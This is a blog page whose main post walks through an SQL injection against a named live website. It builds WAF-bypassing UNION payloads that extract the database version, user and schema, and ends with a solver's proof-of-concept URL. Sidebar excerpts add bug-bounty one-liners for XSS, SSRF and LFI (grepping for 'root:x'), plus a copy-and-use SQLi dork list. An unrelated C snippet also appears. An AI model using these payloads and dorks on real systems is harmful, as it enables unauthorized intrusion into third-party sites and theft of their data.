Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...
Post a Comment

SQLi-2 Solution

 

        <----Solution----> 

--------------------------------------------------------------------------

/**_**/ Let's start /**_**/

Site: https://androssov.ru/briefly/post.php?id=1

**okh let's chek the site is vulnerable or not

--> https://androssov.ru/briefly/post.php?id=1'

Okh we when add an (') after the parameter value, we can see some content of this site is mmissing.

**Ok let's Try to fix the site-

-->https://androssov.ru/briefly/post.php?id=1'--+-

okh the is fixed 

**Let's Count The Number Of Colum.

---> https://androssov.ru/briefly/post.php?id=1' order by 10--+-    Error❌

-->https://androssov.ru/briefly/post.php?id=1' order by 9--+- Fixed  That's means in this site have 9 colum..✅

**Okh Let's select the union

--> https://androssov.ru/briefly/post.php?id=1'UNION SELECT 1,2,3,4,5,6,7,8,9--+-❎

Ups it's shows 403 Forbidden❌

**Let's try another way to fix the error.

--> https://androssov.ru/briefly/post.php... /*!50000SELECT*/ 1,2,3,4,5,6,7,8,9--+-❎

"Wow the site is working...⭕  but we can't use anything with union ❌

***Let's Try another way...

---> https://androssov.ru/briefly/post.php?id=1'UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(😎,(9))--+-

It's working good✅ But it's not showing the vulnerable colum❎

**Let's try to show vulnerable colum..

--->https://androssov.ru/briefly/post.php?id=.1'UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(😎,(9))--+- 

okh the site  is showing vulnerable colum✅

But we can't use anything before the parameter value and also (and,or,but,0,false)

***Ok Let's try to showing vulnerable colum with new way...😉

--> https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(😎,(9))--+-

when we add *@ after the parameter value, the site is showing vulnerable colum.✅

**Ok guys Let's Print CN,Version, Database :-:

:-: Version :-:

-->https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(concat(version())),(6),(7),(😎,(9))--+- ✅

:-: CN,Version :-:

---> https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(concat("D@Rk Hv3X",'<br>',version())),(6),(7),(😎,(9))--+-

Wow I'm able to print version and CN, but the rules is  i can't use <br> and also \n.❎

-->But We can use <p>,<li> 😁✅

**Let's print CN,Version, database, user :-:

---> https://androssov.ru/briefly/post.php?id=1'  *@ UNION(SELECT(1),(2),(3),(4),(concat( 0x4440526b2048763358 , '<li>' ,version(),'<li>',database/**_**/(),'<li>',user())),(6),(7),(😎,(9))--+-

End.

Solvers poc :-:

-------------------------------------/------------------------------------

------->  https://androssov.ru/briefly/post.php?id=1' %26%26  not true union %23%0aselect%23%0a 1,2,version(),4,concat%23%0a('gana de leon<p>',version(),'<p>',user(),'<p>',/*!12345schEMA%23%0A*/()),6,7,8,9 --+-

 Thanks Bro for ur poc

Comments

Post a Comment

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

Image
Huge Sql injection Dork list By Shehzad Roy Just copy it and Followed it........... view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/mes...
Read more

How to find index of the Array in C

 #include<stdio.h> int main() {              int i,num,s,flag=0;     int a[10];     printf("How many elements you want to enter :  ");     scanf("%d",&num);     printf("Enter %d elements in the Array ", num);     for(i=0; i<num; i++){     scanf("%d",&a[i]); } printf("Enter the Element you to Search : "); scanf("%d",&s); for(i=0; i<num; i++){ if(a[i]==s){ flag=1; break; } }  if (flag==0){ printf("Not Found "); }else { printf("Element Found "); for(i=0; i<num; i++){ if(a[i]==s) { printf("%d is Present at Location %d \n",s,i+1); break; } } } return 0; }     
Read more